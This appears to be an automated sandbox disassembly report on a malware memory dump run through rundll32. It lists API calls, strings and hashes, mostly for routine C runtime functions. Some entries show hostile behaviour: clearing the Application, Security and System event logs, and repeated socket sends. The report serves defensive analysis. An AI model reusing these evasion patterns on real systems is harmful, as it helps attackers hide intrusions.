                    • Instruction ID: d9b2a1070d932c59ed25ad3f08c79cace3857b9e3a1d8fc6a29645680fb96cc8
                    • Opcode Fuzzy Hash: 95b6815ed8d5365b76ca7bee348bd75fef52bef4b13260e80015783988f30b0a
                    • Instruction Fuzzy Hash: 8D116671655218ABEB209F6AEC88FAB7BBCEF41751F00405DFD0A87100E774E944E7A2
                    APIs
                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0417C578,00000008,04164813,00000000,00000000,?,0416750C,00000000,00000001,00000000,?,0416B043,00000018,0417C790,0000000C), ref: 0416471C
                    • __lock.LIBCMT ref: 04164750
                      • Part of subcall function 0416B0B8: __mtinitlocknum.LIBCMT ref: 0416B0CE
                      • Part of subcall function 0416B0B8: __amsg_exit.LIBCMT ref: 0416B0DA
                      • Part of subcall function 0416B0B8: EnterCriticalSection.KERNEL32(00000000,00000000,?,041648E3,0000000D,0417C5A0,00000008,041649DA,00000000,?,04163E44,00000000,0417C518,00000008,04163EA9,?), ref: 0416B0E2
                    • InterlockedIncrement.KERNEL32(?), ref: 0416475D
                    • __lock.LIBCMT ref: 04164771
                    • ___addlocaleref.LIBCMT ref: 0416478F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                    • String ID: KERNEL32.DLL
                    • API String ID: 637971194-2576044830
                    • Opcode ID: 6165917fadc70c341bc1136a0925b8f1e744bb53d191fd09870039a51555aaf4
                    • Instruction ID: 07c6c544995bd284fcceeaf360f12c02170660cc09a651aa3760f7a2731e4a92
                    • Opcode Fuzzy Hash: 6165917fadc70c341bc1136a0925b8f1e744bb53d191fd09870039a51555aaf4
                    • Instruction Fuzzy Hash: 2B016D71440B00AFF720EF69D589749FBF0AF41328F10894ED896A66A0CBB4FA94CF55
                    APIs
                    • OpenEventLogA.ADVAPI32(00000000,0417B7EC), ref: 041758FD
                    • ClearEventLogA.ADVAPI32(00000000,00000000), ref: 04175908
                    • CloseEventLog.ADVAPI32(00000000), ref: 0417590F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: Event$ClearCloseOpen
                    • String ID: Application$Security$System
                    • API String ID: 1391105993-2169399579
                    • Opcode ID: 1394279800ecccef20f505d9e1ba7a1ddd390aafeba3634f50c827152cd7eb87
                    • Instruction ID: b0178f2e64d66524bb21dba907f851d51b5984b67511c643e3391599d15dd289
                    • Opcode Fuzzy Hash: 1394279800ecccef20f505d9e1ba7a1ddd390aafeba3634f50c827152cd7eb87
                    • Instruction Fuzzy Hash: D1F0A076A1121477E3119B9FAD88B8FFBBCFF49214F000054EA08A3240C734A9498BA6
                    APIs
                    • __getptd.LIBCMT ref: 0417258E
                      • Part of subcall function 04164838: __getptd_noexit.LIBCMT ref: 0416483B
                      • Part of subcall function 04164838: __amsg_exit.LIBCMT ref: 04164848
                    • __getptd.LIBCMT ref: 0417259F
                    • __getptd.LIBCMT ref: 041725AD
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: __getptd$__amsg_exit__getptd_noexit
                    • String ID: MOC$RCC$csm
                    • API String ID: 803148776-2671469338
                    • Opcode ID: c0ce39c1916d8a9dda21a02b254ebde3567adb5e830cdf3f1d590b44610f3d80
                    • Instruction ID: 3abf0e8c9b687dd97b07cbe85b45acf1015a186b55fa02b37c8220007dc3aaa3
                    • Opcode Fuzzy Hash: c0ce39c1916d8a9dda21a02b254ebde3567adb5e830cdf3f1d590b44610f3d80
                    • Instruction Fuzzy Hash: 05E048742501448FD7209BE8C0D97EC33E8FF88218F5610E1D44DC7232D734F8A18942
                    APIs
                    • __CreateFrameInfo.LIBCMT ref: 04191C4F
                      • Part of subcall function 041917DF: __getptd.LIBCMT ref: 041917ED
                      • Part of subcall function 041917DF: __getptd.LIBCMT ref: 041917FB
                    • __getptd.LIBCMT ref: 04191C59
                      • Part of subcall function 04183A90: __getptd_noexit.LIBCMT ref: 04183A93
                      • Part of subcall function 04183A90: __amsg_exit.LIBCMT ref: 04183AA0
                    • __getptd.LIBCMT ref: 04191C67
                    • __getptd.LIBCMT ref: 04191C75
                    • __getptd.LIBCMT ref: 04191C80
                    • _CallCatchBlock2.LIBCMT ref: 04191CA6
                      • Part of subcall function 04191884: __CallSettingFrame@12.LIBCMT ref: 041918D0
                      • Part of subcall function 04191D4D: __getptd.LIBCMT ref: 04191D5C
                      • Part of subcall function 04191D4D: __getptd.LIBCMT ref: 04191D6A
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                    • String ID:
                    • API String ID: 1602911419-0
                    • Opcode ID: 30984a6dbe13d97b5960a4b950b05162d02aa1851b1736e288da5e5fa3881a39
                    • Instruction ID: d096e9f384bd7915c80f78be57c18d1943915cc736debe24a15d191c7232dfb5
                    • Opcode Fuzzy Hash: 30984a6dbe13d97b5960a4b950b05162d02aa1851b1736e288da5e5fa3881a39
                    • Instruction Fuzzy Hash: E2119975D0020AEFEF00EFA4D588ADE77F0FF04318F548469E825AB251DB39A9559F50
                    APIs
                    • __CreateFrameInfo.LIBCMT ref: 04172847
                      • Part of subcall function 041723D7: __getptd.LIBCMT ref: 041723E5
                      • Part of subcall function 041723D7: __getptd.LIBCMT ref: 041723F3
                    • __getptd.LIBCMT ref: 04172851
                      • Part of subcall function 04164838: __getptd_noexit.LIBCMT ref: 0416483B
                      • Part of subcall function 04164838: __amsg_exit.LIBCMT ref: 04164848
                    • __getptd.LIBCMT ref: 0417285F
                    • __getptd.LIBCMT ref: 0417286D
                    • __getptd.LIBCMT ref: 04172878
                    • _CallCatchBlock2.LIBCMT ref: 0417289E
                      • Part of subcall function 0417247C: __CallSettingFrame@12.LIBCMT ref: 041724C8
                      • Part of subcall function 04172945: __getptd.LIBCMT ref: 04172954
                      • Part of subcall function 04172945: __getptd.LIBCMT ref: 04172962
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                    • String ID:
                    • API String ID: 1602911419-0
                    • Opcode ID: e32059a1870f9c71ff12f063c824557cbf3df37bd7dbe28d22bd439757e7a4e5
                    • Instruction ID: 949d6cb36e15192648acf53d453a34fab765440f989956e2fb8d943c699d11ae
                    • Opcode Fuzzy Hash: e32059a1870f9c71ff12f063c824557cbf3df37bd7dbe28d22bd439757e7a4e5
                    • Instruction Fuzzy Hash: 95110771C00249EFEB00EFA4D484BADBBF4FF08314F5180A9E855A7250DB38AA51DF54
                    APIs
                    • __getptd.LIBCMT ref: 04167EF8
                      • Part of subcall function 04164838: __getptd_noexit.LIBCMT ref: 0416483B
                      • Part of subcall function 04164838: __amsg_exit.LIBCMT ref: 04164848
                    • __amsg_exit.LIBCMT ref: 04167F18
                    • __lock.LIBCMT ref: 04167F28
                    • InterlockedDecrement.KERNEL32(?), ref: 04167F45
                    • _free.LIBCMT ref: 04167F58
                    • InterlockedIncrement.KERNEL32(04321680), ref: 04167F70
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                    • String ID:
                    • API String ID: 3470314060-0
                    • Opcode ID: 81321d7a591b1c4469d7dcae5c6027c935f443f76c08d5a0db179de3aa32093a
                    • Instruction ID: 97cde2348d5f48397743c21e537f5f68441533999b121a3d6c0067eaf5c2b5c0
                    • Opcode Fuzzy Hash: 81321d7a591b1c4469d7dcae5c6027c935f443f76c08d5a0db179de3aa32093a
                    • Instruction Fuzzy Hash: 63016131901725A7EB21AF65A088B5D77B1FB04728F1140C9E836AB6C0D734F9A1CBD5
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: _memset$_strrchr
                    • String ID: D
                    • API String ID: 3722325190-2746444292
                    • Opcode ID: ce5fa5e08b36f509c4af0bf848edf5c17ea2ab9df625cf8cc3875fdae94e2d5c
                    • Instruction ID: e0015f9a50f2adfa91e8f7cc9dd3b56ad118f3fe447ed4890a5978a216303128
                    • Opcode Fuzzy Hash: ce5fa5e08b36f509c4af0bf848edf5c17ea2ab9df625cf8cc3875fdae94e2d5c
                    • Instruction Fuzzy Hash: A341EBB29041186BEB24EB64CCC9FEE77B89F54704F0441D9E609A7180DB75AF4ACF61
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 04161758
                      • Part of subcall function 0416217D: std::exception::exception.LIBCMT ref: 04162192
                      • Part of subcall function 0416217D: __CxxThrowException@8.LIBCMT ref: 041621A7
                      • Part of subcall function 0416217D: std::exception::exception.LIBCMT ref: 041621B8
                    • std::_Xinvalid_argument.LIBCPMT ref: 04161776
                    • std::_Xinvalid_argument.LIBCPMT ref: 04161791
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw
                    • String ID: invalid string position$string too long
                    • API String ID: 4225265588-4289949731
                    • Opcode ID: 4da912f0cb59f26b3a4d5e1c1fb5d42123bbeb22da2426a800fedf1c3fddf02b
                    • Instruction ID: 17b3cf6899041148333443e93326a6c4fd7ced2b50f73e3a11c191eec69ce06e
                    • Opcode Fuzzy Hash: 4da912f0cb59f26b3a4d5e1c1fb5d42123bbeb22da2426a800fedf1c3fddf02b
                    • Instruction Fuzzy Hash: 1621D332304304ABD324DE6CE8D0A6AB7E9AF91755F204A6EE5978B240D771F86087A0
                    APIs
                    • ___BuildCatchObject.LIBCMT ref: 04191FE7
                      • Part of subcall function 04191F42: ___BuildCatchObjectHelper.LIBCMT ref: 04191F78
                    • _UnwindNestedFrames.LIBCMT ref: 04191FFE
                    • ___FrameUnwindToState.LIBCMT ref: 0419200C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                    • String ID: csm$csm
                    • API String ID: 2163707966-3733052814
                    • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                    • Instruction ID: 00eac62e7d75be61b48ae3a9a3aab69d5460cf4b402ceba85941589b4459527a
                    • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                    • Instruction Fuzzy Hash: B101F67100110ABBFF12AF51CC84EEA7FAAEF09394F044454FD5815160DB76E9B1DBA0
                    APIs
                    • EnterCriticalSection.KERNEL32(76232460,76938400,0417B824), ref: 041775A4
                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 041775BD
                    • _rand.LIBCMT ref: 041775CC
                    • wsprintfA.USER32 ref: 04177641
                    • LeaveCriticalSection.KERNEL32(?,?,?), ref: 04177746
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterFreeLeaveVirtual_randwsprintf
                    • String ID:
                    • API String ID: 54394521-0
                    • Opcode ID: 1098f68ae23ab350faa5f17b236be91bef21ad2fbc26c7e93c0f784624a57da8
                    • Instruction ID: 6f6e2dd45c5eb015d77f467097897f8b2bdd0378e3d9afad39f1088e93c35b58
                    • Opcode Fuzzy Hash: 1098f68ae23ab350faa5f17b236be91bef21ad2fbc26c7e93c0f784624a57da8
                    • Instruction Fuzzy Hash: 5451A271600516ABEB15DF69CCC49AAF7B9FF04318F048669E829D7240DB34FA55CBD0
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                    • String ID:
                    • API String ID: 4048096073-0
                    • Opcode ID: 85830fdd0532c69352a8dafae8a1de59cb1b951ebad45c523fb0a824246297a3
                    • Instruction ID: e6927bb1760a4a36f1cfab6574df5bff12e7cc8b713fc075050c6d4b17c3a209
                    • Opcode Fuzzy Hash: 85830fdd0532c69352a8dafae8a1de59cb1b951ebad45c523fb0a824246297a3
                    • Instruction Fuzzy Hash: 0D51B331B00209EBDB24AFA989C469EB7B5AF50324F1586EDE827961D0D770FA70DB50
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7d2a4160f2b90d1253b2ff13d71a2806da2d2b6e8187e80e3ab190fb4e39c3a7
                    • Instruction ID: 494fe3cb38ffded81acbdbf99781dbc7bca5c9fff97f04b1bf7fff2b09685db5
                    • Opcode Fuzzy Hash: 7d2a4160f2b90d1253b2ff13d71a2806da2d2b6e8187e80e3ab190fb4e39c3a7
                    • Instruction Fuzzy Hash: DB31A0B1710200AFE720DF69DCC5F2A77FAEB88754F544599FA08CB641E7B1E9008B94
                    APIs
                    • send.WS2_32(?,?,00002000,00000000), ref: 04177164
                    • Sleep.KERNEL32(0000001E), ref: 04177172
                    • Sleep.KERNEL32(0000001E), ref: 0417718E
                    • send.WS2_32(?,?,00000000,00000000), ref: 041771C1
                    • Sleep.KERNEL32(00000064), ref: 041771CF
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: Sleep$send
                    • String ID:
                    • API String ID: 4079979460-0
                    • Opcode ID: 67069bd2e3466cd4c3014f7c2ab9ee3543076b38ac32dfeba1cfa168eab28785
                    • Instruction ID: f2f5f7b9728fc7bb95bcfee7487e648497e5095ac8f9f0d9ed30e32747ac83ad
                    • Opcode Fuzzy Hash: 67069bd2e3466cd4c3014f7c2ab9ee3543076b38ac32dfeba1cfa168eab28785
                    • Instruction Fuzzy Hash: 7321AE71911308ABE720DBA9C8C8B8EBBB5EB44791F2041A5F914D72C0C774B984C790
                    APIs
                    • _malloc.LIBCMT ref: 041635AB
                      • Part of subcall function 0416375E: __FF_MSGBANNER.LIBCMT ref: 04163777
                      • Part of subcall function 0416375E: __NMSG_WRITE.LIBCMT ref: 0416377E
                      • Part of subcall function 0416375E: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,0416750C,00000000,00000001,00000000,?,0416B043,00000018,0417C790,0000000C,0416B0D3), ref: 041637A3
                    • _free.LIBCMT ref: 041635BE
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: AllocHeap_free_malloc
                    • String ID:
                    • API String ID: 2734353464-0
                    • Opcode ID: e281090bbaa04d12bfd87852c5e5766924c1ac4fab2a1958598999ea107a3302
                    • Instruction ID: 104499ac0667f2770cc16ff725efb7ce1b6591ae33bc202d60a0fa8c2010a1ee
                    • Opcode Fuzzy Hash: e281090bbaa04d12bfd87852c5e5766924c1ac4fab2a1958598999ea107a3302
                    • Instruction Fuzzy Hash: 98110D32505219FBDF252F74B88465D3BDAEF40275B124165FC6B9B240EF34FA704694
                    APIs
                    • __getptd.LIBCMT ref: 04168679
                      • Part of subcall function 04164838: __getptd_noexit.LIBCMT ref: 0416483B
                      • Part of subcall function 04164838: __amsg_exit.LIBCMT ref: 04164848
                    • __getptd.LIBCMT ref: 04168690
                    • __amsg_exit.LIBCMT ref: 0416869E
                    • __lock.LIBCMT ref: 041686AE
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 041686C2
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                    • String ID:
                    • API String ID: 938513278-0
                    • Opcode ID: 261bbcfa1496bf12482e82100bd78577a12e22e917f1979ae5c9110d271777a6
                    • Instruction ID: 6e0485965862e0d097dc90b547861cbfab2cd25a3afbde09818ec0e9bc96c3ee
                    • Opcode Fuzzy Hash: 261bbcfa1496bf12482e82100bd78577a12e22e917f1979ae5c9110d271777a6
                    • Instruction Fuzzy Hash: 06F09032946714DBFB21BFA5988574D76E0AF0072CF514589E817AB2D0CB64F8A0CB5A
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 0416166A
                      • Part of subcall function 04162130: std::exception::exception.LIBCMT ref: 04162145
                      • Part of subcall function 04162130: __CxxThrowException@8.LIBCMT ref: 0416215A
                      • Part of subcall function 04162130: std::exception::exception.LIBCMT ref: 0416216B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                    • String ID: vector<T> too long$yxxx$yxxx
                    • API String ID: 1823113695-1517697755
                    • Opcode ID: 480f5e82664877bf0eb0b3c68b3c774da91e8ad241fd764b182dd937b799bea6
                    • Instruction ID: 91389a71012d9f6add55cf1c57bb286545d2f0703dc9d0e0aae4b61655c614ae
                    • Opcode Fuzzy Hash: 480f5e82664877bf0eb0b3c68b3c774da91e8ad241fd764b182dd937b799bea6
                    • Instruction Fuzzy Hash: 3A21C8B2E002056FC308DF5DD881A5AB7EAE794315F15462AD9169B384DB78FE508A90
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 041614BE
                      • Part of subcall function 04162130: std::exception::exception.LIBCMT ref: 04162145
                      • Part of subcall function 04162130: __CxxThrowException@8.LIBCMT ref: 0416215A
                      • Part of subcall function 04162130: std::exception::exception.LIBCMT ref: 0416216B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                    • String ID: vector<T> too long$yxxx$yxxx
                    • API String ID: 1823113695-1517697755
                    • Opcode ID: a7e18f730f17766ce5fa84f8072c37dc1930e5432ed1072e7bf4caa14295deda
                    • Instruction ID: 5ae7ad9b8dbd67262f27ca05558192abfed8ff6126fb6331e2fc4c2d394c242f
                    • Opcode Fuzzy Hash: a7e18f730f17766ce5fa84f8072c37dc1930e5432ed1072e7bf4caa14295deda
                    • Instruction Fuzzy Hash: DBF09623B040322B871C6C7DEC944BD958797D039531A8639ED13DF7D9EB60FDA1A690
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: __calloc_crt__init_pointers__mtterm_free
                    • String ID:
                    • API String ID: 3556499859-0
                    • Opcode ID: b188500a3c1a0b6836b8d1b60a3ba4c009d566f15eabf9a274527e3b55d9f75c
                    • Instruction ID: 17809dccaf08228ffc09d1beb2f2f8b35427beb9297194a3d6c05913b3492211
                    • Opcode Fuzzy Hash: b188500a3c1a0b6836b8d1b60a3ba4c009d566f15eabf9a274527e3b55d9f75c
                    • Instruction Fuzzy Hash: A4316F71800635AEF711BF75ACC8A793EA6EB69768714C21EE824D72A0DB32D441CF50
                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0416DF90
                    • __isleadbyte_l.LIBCMT ref: 0416DFC3
                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,?,?,00000103,00000000,00000000), ref: 0416DFF4
                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000001,00000000,00000000,?,?,?,00000103,00000000,00000000), ref: 0416E062
                    Memory Dump Source
                    • Source File: 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmp, Offset: 04160000, based on PE: true
                    • Associated: 0000000B.00000002.2296201390.00000000041A2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 0000000B.00000002.2296201390.00000000041AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_4160000_rundll32.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: 164bab4373c9952f807c70009c7853e91677207ec290d405182b6beba3bbe8dc
                    • Instruction ID: e489ad6a8de424a0035faaa3c08ddb6006bd3f5b9c69ea4f51c24621963a39b7
                    • Opcode Fuzzy Hash: 164bab4373c9952f807c70009c7853e91677207ec290d405182b6beba3bbe8dc
